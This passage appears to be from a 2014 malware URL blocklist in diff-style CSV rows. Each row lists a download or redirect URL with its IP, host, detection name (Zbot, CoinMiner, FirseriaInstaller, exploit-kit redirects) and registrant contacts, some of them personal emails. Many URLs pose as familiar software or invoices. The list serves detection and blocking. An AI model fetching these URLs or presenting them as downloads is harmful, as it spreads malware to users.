+"2014/01/06_12:28","dl.downf468.com/n/3.0.26.2/5785797/FLV_Media_Player.exe=0D=0Ahttp:/dl.softohqimjjedf0jq.net/n/3.0.26.2/11359629/Stream_Movies_Online.exe=","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.2/6068293/winrarfree.exe=0D=0Ahttp:/dl.softpzivrubajjui.net/n/3.0.26.2/11717749/Winzip.exe=","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26/11797512/FLV_Media_Player.exe=0D=0Ahttp:/redtubes.ru/FgoKDkRRURgRDB0bDVAcCwdTGBcSG1AMC1EZGwohBhMSQRgXEhshFxpD/audio/127974014/481402808/toca_toca_radio_edit.exe=","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.2/4924888/100-villancicos.exe","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.1/12023961/microsofthesapmakinesi.exe","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.2/4800574/sculptris.exe","96.17.161.145","a96-17-161-145.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26/5436359/FLV_Media_Player.exe=0D=0Ahttp:/dl01.fabdmr.com/n/3.0.26/6498621/FLV_Media_Player.exe=","96.17.161.145","a96-17-161-145.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26/187807/Utorrent.exe=0D=0Ahttp:/dl01.facdmr.com/n/3.0.26/4993202/Mediaget.exe=","96.17.161.145","a96-17-161-145.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26/2105371/AVS_Media_Player.exe=0D=0Ahttp:/dl01.faadmr.com/n/3.0.26/11822316/FLV_Media_Player.exe=","96.17.161.145","a96-17-161-145.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26/2094912/AVS_Media_Player.exe=0D=0Ahttp:/installsupdater.info/syshost.exe=","96.17.161.145","a96-17-161-145.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26/5738856/FLV_Media_Player.exe=0D=0Ahttp:/dl.softohqimjjedf0jq.net/n/3.0.26/3484691/SimTractor.exe=","96.17.161.145","a96-17-161-145.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26/2632028/AVS_Media_Player.exe=0D=0Ahttp:/download.multiinstall.com.br/a75e4b51a7dfadaa4b8a88436b76af41/Quadro_1600x1200.exe=","96.17.161.145","a96-17-161-145.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26/2105407/AVS_Media_Player.exe=0D=0Ahttp:/dl.softohqimjjedf0jq.net/n/3.0.26/4351718/Vlc_Media_Player.exe=","96.17.161.145","a96-17-161-145.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.2/11813765/n0140.exe","96.17.161.145","a96-17-161-145.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26/2105407/AVS_Media_Player.exe=0D=0Ahttp:/tube-city.ru/1MjIzIaTk8/J0c/J0tvPzNnfyM6SzsmT29nI49jTy9LQ093Y48TR0OOPg9XYgQ=3D=3D/torrent/5387708/159507868/download.exe=","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26/4351718/Vlc_Media_Player.exe=0D=0Ahttp:/dl.softohqimjjedf0jq.net/n/3.0.26/6708421/Ares.exe=","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26/6068293/winrarfree.exe=0D=0Ahttp:/dl01.fabdmr.com/n/3.0.26/5034600/J_DOWNLOADER.exe=","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.2/11810098/n2018.exe","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.1/2629037/manual-de-configuraci&;amp;oacute;n-del-putty.exe","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.2/11853911/Adobe_PDF_Reader.exe=0D=0Ahttp:/dl.softpzivrubajjui.net/n/3.0.26.2/5565169/FLVMPlayer.exe=","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.2/11975718/ultrasurf13.03.exe","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.2/4866666/macromedia-freehand.exe","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.2/6690540/minecraft1.5.2.exe","96.17.161.145","a96-17-161-145.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.2/5983928/app.exe","96.17.161.145","a96-17-161-145.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26/11930758/File_installer.exe=0D=0Ahttp:/dl.downe468.com/n/3.0.26/11928104/Ares.exe=","96.17.161.145","a96-17-161-145.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.2/4889139/the-hunter.exe","96.17.161.145","a96-17-161-145.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26/11930758/File_installer.exe=0D=0Ahttp:/dl.downf468.com/n/3.0.26/11893495/Update_Code_Generator.exe=","96.17.161.145","a96-17-161-145.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.2/5570947/mipony.exe","96.17.161.145","a96-17-161-145.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26/11930758/File_installer.exe=0D=0Ahttp:/dl.softohqimjjedf0jq.net/n/3.0.26/12091048/Skype.exe=","96.17.161.145","a96-17-161-145.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26/11930758/File_installer.exe=0D=0Ahttp:/dl01.fabdmr.com/n/3.0.26/187807/Utorrent.exe=","96.17.161.145","a96-17-161-145.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26/11930758/File_installer.exe=0D=0Ahttp:/dl.downf468.com/n/3.0.26/7088851/FLV_Media_Player.exe=","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.25/11810424/n5250.exeo:=","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.3/11706753/d0005.exe=","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/11810692/n5062.exeo:p/o:p=","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.25/11706811/psx0109.exe=","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.25/11784924/p1232.exeo:=","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.25/11560994/d3dx9_31.exe=","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.1/3285684/lógica-y-teoría-de-conjuntos.exe","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.3/4789537/setup.exe","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.3/8311230/avast.exe","96.17.161.145","a96-17-161-145.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.3/4812448/pointagedheures.exe","96.17.161.145","a96-17-161-145.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.3/5347935/wondersharepdftoword.exe","96.17.161.145","a96-17-161-145.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.24.1/4790826/HandballChallenge.exe","96.17.161.145","a96-17-161-145.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.3/11439286/msvcr100.exe","96.17.161.145","a96-17-161-145.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.3/3708/teamviewer.exe","96.17.161.145","a96-17-161-145.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.3/11442660/d3dx9_43.exe","96.17.161.145","a96-17-161-145.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.1/6156061/¿dónde-está-carmen-sandiego?.exe","96.17.161.145","a96-17-161-145.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.3/11812198/n4250.exe","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.3/11811219/n4911.exe","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.3/11970252/skype.exe","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.3/6654650/alzip.exe","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.3/2836178/gambasalaegipcia.exe","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.3/11809923/n5574.exe","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.3/11707321/psx0026.exe","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.26.3/11706755/d0004.exe","96.17.161.137","a96-17-161-137.deploy.akamaitechnologies.com.","Win32/FirseriaInstaller.C","-","12989","0","US", +"2014/01/08_22:47","valouweeigenaren.nl/customers/billing/df367548-18.zip","46.235.47.28","srv047028.webreus.nl.","Trojan","-","34233","0","NL", +"2014/01/08_22:49","valouweeigenaren.nl/customers/cases/acc56-81-93.zip","46.235.47.28","srv047028.webreus.nl.","Trojan","-","34233","0","NL", +"2014/01/09_23:39","-","119.245.150.94/fF3krry.exe Trojan.Backdoor.RV","suntoy.jp.","-","-","2514","0","JP", +"2014/01/09_23:39","directxex.com/uploads/815597715.bot.exe Trojan.Agent","173.245.61.76","cf-173-245-61-76.cloudflare.com.","-","Registrar Abuse Contact abuse@enom.com","13335","0","US", +"2014/01/09_23:39","news4cars.com/misc/uip/adobe_flash.exe Trojan.Agent","37.148.207.1","n1nlhg640c1640.shr.prod.ams1.secureserver.net.","-","-","26496","0","NL", +"2014/01/09_23:39","rocksresort.com.au/image/pdf.exe Trojan.Zbot","67.22.142.73","unknown.dal.cologlobal.com.","-","Joel Peterson / Visit whois.ausregistry.com.au for Web based WhoIs","12179","0","CA", +"2014/01/09_23:39","updo.nl/file/b24d1856.exe Trojan.Injector","149.210.134.83","149-210-134-83.colo.transip.net.","-","-","20857","0","NL", +"2014/01/09_23:39","directxex.com/uploads/1395655996.ss.exe Win32/AutoRun.IRCBot.JD","173.245.61.76","cf-173-245-61-76.cloudflare.com.","-","Registrar Abuse Contact abuse@enom.com","13335","0","US", +"2014/01/09_23:39","directxex.com/uploads/144543902.rundll32.exe Trojan","173.245.61.76","cf-173-245-61-76.cloudflare.com.","-","Registrar Abuse Contact abuse@enom.com","13335","0","US", +"2014/01/09_23:39","directxex.com/uploads/1552287385.igfxtray.exe Win32/CoinMiner.IS","173.245.60.76","cf-173-245-60-76.cloudflare.com.","-","Registrar Abuse Contact abuse@enom.com","13335","0","US", +"2014/01/09_23:39","directxex.com/uploads/1576253022.miner.txt Win32/CoinMiner.IS","173.245.60.76","cf-173-245-60-76.cloudflare.com.","-","Registrar Abuse Contact abuse@enom.com","13335","0","US", +"2014/01/09_23:39","directxex.com/uploads/2074531303.BIN.exe Win32/Napolar.A","173.245.60.76","cf-173-245-60-76.cloudflare.com.","-","Registrar Abuse Contact abuse@enom.com","13335","0","US", +"2014/01/09_23:39","directxex.com/uploads/815597715.bot.exe Win32/Spy.Zbot.AAQ","173.245.60.76","cf-173-245-60-76.cloudflare.com.","-","Registrar Abuse Contact abuse@enom.com","13335","0","US", +"2014/01/09_23:39","directxex.com/uploads/84937512.And.exe Win32/Injector.AUJQ","173.245.60.76","cf-173-245-60-76.cloudflare.com.","-","Registrar Abuse Contact abuse@enom.com","13335","0","US", +"2014/01/09_23:39","directxex.com/uploads/939195944.newmine.exe MSIL/CoinMiner.AY","173.245.61.76","cf-173-245-61-76.cloudflare.com.","-","Registrar Abuse Contact abuse@enom.com","13335","0","US", +"2014/01/09_23:39","ttb.tbddlw.com/download/request/51a9b7865f1c1eb81f000001/CtlLI2Yz?PubID=3457_2776&ClickID=3247011638 PUP.FakeJava","54.218.45.67","ec2-54-218-45-67.us-west-2.compute.amazonaws.com.","-","Registrant domains@tuguu.com","16509","0","US", +"2014/01/19_09:40","yumekin.com/inde.php","108.179.202.25","-","Trojan","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","36351","0","US", +"2014/01/19_09:40","yumekin.com/inde.php?comercial@cohesp.com.br","108.179.202.25","-","Trojan","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","36351","0","US", +"2014/01/22_14:39","-","221.132.37.26/sh","-","Linux malware","-","7643","0","VN", +"2014/02/07_09:50","keyways.pt/~keyways/1.html","94.23.79.17","cluster006.ovh.net.","Leads to exploit at jolygoestobeinvester.ru","KEYWAYS, CONSULTING, LDA / luis.m.nascimento@gmail.com","16276","0","FR", +"2014/02/07_10:24","www.lccl.org.uk/1.html","67.231.249.62","s62.EXCALIBURHOST.COM.","Leads to exploit at jolygoestobeinvester.ru","LONDON CORPORATE COLLEGE LTD. / -","40244","0","US", +"2014/02/07_10:27","nt-associates.com/1.html","213.171.218.52","server213-171-218-52.livedns.org.uk.","Leads to exploit at jolygoestobeinvester.ru","Registrar Abuse Contact domainabuse@tucows.com","15418","0","GB", +"2015/02/04_13:35","ads.wikipartes.com/all/test.php","31.192.210.88","server.yakanaydinlatma.com.tr.","redirects to exploit kit","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","51559","0","TR", +"2014/02/07_11:02","nestorconsulting.net/1.html","74.50.25.155","chaos.lunarbreeze.com.","Leads to exploit at jolygoestobeinvester.ru","Registrar Abuse Contact domainabuse@tucows.com","15244","0","US", +"2014/02/07_11:02","portraitphotographygroup.com/~lorijill/1.html","192.185.46.31","-","Leads to exploit at jolygoestobeinvester.ru","-","20013","0","US", +"2014/02/07_11:05","d1054130-28095.cp.blacknight.com/1.html","78.153.216.42","PEMLINWEB133.blacknight.com.","Leads to exploit at jolygoestobeinvester.ru","Registrar Abuse Contact abuse@blacknight.com","39122","0","IE", +"2014/02/07_11:30","-","91.99.102.154/1.html","91.99.102.154.parsonline.net.","Leads to exploit at jolygoestobeinvester.ru","-","16322","0","IR", +"2014/02/07_11:39","mylabsrl.com/1.html","46.28.6.113","-","Leads to exploit at jolygoestobeinvester.ru","Registrar Abuse Contact abuse@serverplan.com","1267","0","IT", +"2014/02/07_12:01","tavuks.com/_vti_bin/1und1.php/","37.247.99.221","host-37-247-99-221.routergate.com.","Trojan","coskun ozek / jarnsaxa@gmail.com","43260","0","TR", +"2014/02/07_13:34","ozzysixsixsix.web.fc2.com/1.html","208.71.106.61","hps13.fc2.com.","Leads to exploit at jolygoestobeinvester.ru","Registrar Abuse Contact domainabuse@tucows.com","40263","0","US", +"2014/02/07_13:34","alisat.biz/1.html","211.43.212.39","linux39.gabia.com.","Leads to exploit at jolygoestobeinvester.ru","Nohsumi / nsm@kku.ac.kr","3786","0","KR", +"2014/02/07_13:34","109-204-26-16.netconnexion.managedbroadband.co.uk/1.html","109.204.26.16","109-204-26-16.netconnexion.managedbroadband.co.uk.","Leads to exploit at jolygoestobeinvester.ru","Griffin Information Systems LTD / -","20500","0","GB", +"2014/02/07_13:34","www.nothingcompares.co.uk/1.html","82.165.204.223","kundenserver.de.","Leads to exploit at jolygoestobeinvester.ru","Appleby Creamery / -","8560","0","DE", +"2014/02/07_13:34","ip-182-50-129-164.ip.secureserver.net/1.html","182.50.129.164","ip-182-50-129-164.ip.secureserver.net.","Leads to exploit at jolygoestobeinvester.ru","-","26496","0","SG", +"2014/02/07_13:34","users173.lolipop.jp/~lolipop.jp-204f9d446b7f9eb/1.html","210.157.22.62","users173.phy.lolipop.jp.","Leads to exploit at jolygoestobeinvester.ru","paperboy&co. / jp@muumuu-domain.com","7506","0","JP", +"2014/02/07_13:47","alexandria90.etcserver.com/~psychica/1.html","50.23.98.194","alexandria90.etcserver.com.","Leads to exploit at jolygoestobeinvester.ru","Registrar Abuse Contact abuse@enom.com","36351","0","US", +"2014/02/07_13:47","-","42.96.151.54/1.html","-","Leads to exploit at jolygoestobeinvester.ru","-","37963","0","CN", +"2014/02/07_13:47","-","91.99.102.154/1.html","91.99.102.154.parsonline.net.","Leads to exploit at jolygoestobeinvester.ru","-","16322","0","IR", +"2014/02/07_14:04","nortonfire.co.uk/1.html","82.165.213.55","kundenserver.de.","Leads to exploit at jolygoestobeinvester.ru","Daniel Reeve / -","8560","0","DE", +"2014/02/07_14:21","hrdcvn.com.vn/1.html","123.30.184.132","vdc184-132.vmms.vn.","Leads to exploit at jolygoestobeinvester.ru","-","7643","0","VN", +"2014/02/07_14:31","finnhair.co.uk/1.html","208.123.212.48","wp03.yeg.alentus.net.","Leads to exploit at jolygoestobeinvester.ru","Nina Brazendale, P Percival and R Percival / -","25745","0","US", +"2014/02/07_14:56","advancetec.co.uk/1.html","212.48.68.157","atfx.atfx-systems.co.uk.","Leads to exploit at jolygoestobeinvester.ru","advance technologies / -","20738","0","GB", +"2014/02/07_15:13","tamilcm.com/1.html","67.227.152.196","windows2.india-to.net.","Leads to exploit at jolygoestobeinvester.ru","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","32244","0","US", +"2014/02/07_15:22","noobgirls.com/pussy.php","107.161.144.14","pluffpass.com.","Trojan","Moniker Privacy Services / NOOBGIRLS.COM@monikerprivacy.net","36352","0","US", +"2014/02/07_15:22","noobgirls.com/pussy.exe","107.161.144.14","pluffpass.com.","Trojan","Moniker Privacy Services / NOOBGIRLS.COM@monikerprivacy.net","36352","0","US", +"2014/02/07_15:39","landisbaptist.com/1.html","67.210.126.85","lyra.lunarpages.com.","Leads to exploit at jolygoestobeinvester.ru","Registrar Abuse Contact abuse@web.com","15244","0","US", +"2014/02/07_16:49","www.3peaks.co.jp/1.html","211.19.24.235","usr235.g024.nabic.jp.","Leads to exploit at jolygoestobeinvester.ru","three@soho-net.ne.jp","23641","0","JP", +"2014/02/07_17:00","corroshield.estb.com.sg/1.html","203.125.76.84","ns2.e-dir.com.sg.","Leads to exploit at jolygoestobeinvester.ru","support@e-dir.com","3758","0","SG", +"2014/02/07_17:10","d1171912.cp.blacknight.com/1.html","78.153.215.53","-","Leads to exploit at jolygoestobeinvester.ru","Registrar Abuse Contact abuse@blacknight.com","39122","0","IE", +"2014/02/07_17:10","phitenmy.com/1.html","202.190.181.149","149.128.181.190.202.in-addr.arpa.","Leads to exploit at jolygoestobeinvester.ru","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","2042","0","MY", +"2014/02/07_17:15","marchen-toy.co.jp/1.html","111.68.244.2","marchen-toy.co.jp.","Leads to exploit at jolygoestobeinvester.ru","main@marchen-toy.co.jp","2914","0","JP", +"2014/02/07_17:20","salon77.co.uk/1.html","79.171.34.9","mail62.hostinguk.net.","Leads to exploit at jolygoestobeinvester.ru","Barry Everton / -","33968","0","GB", +"2014/02/07_17:35","divine.lunarbreeze.com/~xenoa3/1.html","216.227.215.8","divine.lunarbreeze.com.","Leads to exploit at jolygoestobeinvester.ru","Registrar Abuse Contact domainabuse@tucows.com","15244","0","US", +"2014/02/07_17:40","kadman.net/1.html","195.189.140.28","28.hosting-5.xtream.co.il.","Leads to exploit at jolygoestobeinvester.ru","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","9116","0","IL", +"2014/02/07_17:51","sysconcalibration.com/1.html","174.141.228.147","win11.hostingmantra.com.","Leads to exploit at jolygoestobeinvester.ru","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","32613","0","US", +"2014/02/07_19:06","ip-182-50-129-181.ip.secureserver.net/~venkat/1.html","182.50.129.181","ip-182-50-129-181.ip.secureserver.net.","Leads to exploit at jolygoestobeinvester.ru","-","26496","0","SG", +"2014/02/07_19:06","treventuresonline.com/1.html","192.185.41.48","-","Leads to exploit at jolygoestobeinvester.ru","Registrar Abuse Contact abuse@enom.com","20013","0","US", +"2014/02/10_13:58","miracema.rj.gov.br/counter.php","187.73.33.43","web101.f1.k8.com.br.","iFrame.Exploit (injected into compromised sites, e.g. www.plantes-sauvages.fr/fiche_lierre_terrestre.htm)","Sérgio Chiapetta Leal / schiapett@proderj.rj.gov.br","262672","0","BR", +"2014/02/10_13:58","signready.com/counter.php","50.87.146.115","50-87-146-115.unifiedlayer.com.","iFrame.Exploit","Registrar Abuse Contact abuse@1and1.com","46606","0","US", +"2014/02/10_15:44","vistatech.us/gangplanks/trysted.exe","192.185.24.77","ns227.websitewelcome.com.","Trojan.Muiref","Hamed Tafreshi / hamed@vistatech.us","20013","0","US", +"2014/02/10_15:44","batcoroadlinescorporation.com/concedes/diggers.exe","184.172.49.3","svr1.infowaveindia.com.","Trojan.Muiref","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","36351","0","US", +"2014/02/11_02:45","updat120.clanteam.com","67.220.217.235","67-220-217-235.hosted.static.webnx.com.","Exploit","-","18450","0","US", +"2014/02/11_02:45","updat120.clanteam.com/ie7.htm","67.220.217.235","67-220-217-235.hosted.static.webnx.com.","Exploit","-","18450","0","US", +"2014/02/11_02:45","updat120.clanteam.com/ie8.htm","67.220.217.235","67-220-217-235.hosted.static.webnx.com.","Exploit","-","18450","0","US", +"2014/02/11_02:45","updat120.clanteam.com/calc","67.220.217.235","67-220-217-235.hosted.static.webnx.com.","Trojan","-","18450","0","US", +"2014/02/11_02:53","www.tvnews.or.kr/web/main.gif","210.205.6.203","-","Trojan","-","9318","0","KR", +"2014/02/11_02:56","www.tvnews.or.kr/web/view.html","210.205.6.203","-","Win32/Exploit.CVE-2013-3897.A","-","9318","0","KR", +"2014/02/11_02:56","www.tvnews.or.kr/web/menu.gif","210.205.6.203","-","Trojan","-","9318","0","KR", +"2014/04/09_07:44","id405441215-8305493831.h121h9.com/","146.185.235.8","-","Browser Ransomware","-","15626","0","RU", +"2014/02/12_11:08","dent-lux.com.pl/02-2014/bills/tr-264-365-11.zip","93.157.100.74","s47-www.ogicom.net.","Trojan","bok@domena.pl","57807","0","PL", +"2014/02/12_11:08","www.studiochiarelli.eu/02-2014/clients/order.3757.zip","195.110.124.133","opus.register.it.","Trojan","NOT DISCLOSED! / support@register.it","39729","0","IT", +"2014/02/12_11:08","www.toochattoo.com/fond-ecran-anime/chinois1.exe","88.190.253.247","pf7-web.online.net.","Trojan","Owner franck.duparc@wanadoo.fr","12322","0","FR", +"2014/03/11_22:39","somethingnice.hc0.me/Miner/Miner.txt","5.135.127.68","-","Trojan.PlasmaRAT","WhoisGuard Protected / 630ca54ebc794d67bd94109ac2190e52.protect@whoisguard.com","16276","0","FR", +"2014/03/11_22:39","somethingnice.hc0.me/Miner/jhProtominer.files","5.135.127.68","-","Trojan.PlasmaRAT","WhoisGuard Protected / 630ca54ebc794d67bd94109ac2190e52.protect@whoisguard.com","16276","0","FR", +"2014/03/11_22:39","somethingnice.hc0.me/Miner/GPUMiner.files","5.135.127.68","-","Trojan.PlasmaRAT","WhoisGuard Protected / 630ca54ebc794d67bd94109ac2190e52.protect@whoisguard.com","16276","0","FR", +"2014/03/06_17:46","onrio.com.br/site/Pdf/","187.1.140.30","web601.uni5.net.","Trojan","OnRio Serviços de Informática Ltda ME / onrio@onrio.com.br","28299","0","BR", +"2014/03/11_22:39","somethingnice.hc0.me/Miner/CPUMiner.files","5.135.127.68","-","Trojan.PlasmaRAT","WhoisGuard Protected / 630ca54ebc794d67bd94109ac2190e52.protect@whoisguard.com","16276","0","FR", +"2014/03/06_17:46","portalfiremasters.com.br/Fatura.Pdf.rar","189.112.170.155","155.128/25.170.112.189.in-addr.arpa.","Trojan","Alexandre Cavalcanti Duran / alexandre.duran@gmail.com","16735","0","BR", +"2014/02/14_23:35","www.divshare.com/direct/25151579-efd.mexx","208.100.16.103","app2.divshare.com.","Backdoor.Bot","-","32748","0","US", +"2014/02/14_23:35","-","94.23.62.190/calc.exe","ns206681.ovh.net.","Trojan.Agent.FSA74","-","16276","0","FR", +"2014/02/14_23:35","-","94.23.62.190/upeksvr.exe","ns206681.ovh.net.","Trojan.Kelihos","-","16276","0","FR", +"2014/02/14_23:35","edf.fr.kfskz.com/facture_edf.pdf.03.exe","195.93.153.1","web-c-1.neolabs.kz.","Backdoor.Bot.MSIL","Registrar Abuse Contact abuse@enom.com","44256","0","KZ", +"2014/02/17_10:32","bracewellfamily.com/PayInfo.zip?JQrk Trojan.Zbot","96.127.180.194","s9-chicago.accountservergroup.com.","-","-","32475","0","US", +"2014/02/17_10:32","www.smartgvcfunding.com/Invoice.zip?21VJRpXbAFI7wa Trojan.Zbot","209.235.144.9","hostedc31.carrierzone.com.","-","Internet Services BT Business / domains@btdomainsaccount.com","30447","0","US", +"2014/02/17_10:32","www.fabioalbini.com/Order.zip?YIjoBgGhCBbs Trojan.Zbot","195.110.150.4","net150-004.mclink.it.","-","Registrar Abuse Contact domainabuse@tucows.com","5396","0","IT", +"2014/02/18_15:40","funchill.com/Invoice.zip","192.254.236.149","-","Trojan.Zbot","-","46606","0","US", +"2014/02/18_15:40","nc2199.eden5.netclusive.de/Invoice.zip","89.110.129.55","eden5.netclusive.de.","Trojan.Zbot","hostmaster@netclusive.de","24989","0","DE", +"2014/02/18_15:40","notebookservisru.161.com1.ru/PayInfo.zip","89.108.67.65","cp161.agava.net.","Trojan.Zbot","-","43146","0","RU", +"2014/02/18_15:40","www.fabioalbini.com/Invoice.zip","195.110.150.4","net150-004.mclink.it.","Trojan.Zbot","Registrar Abuse Contact 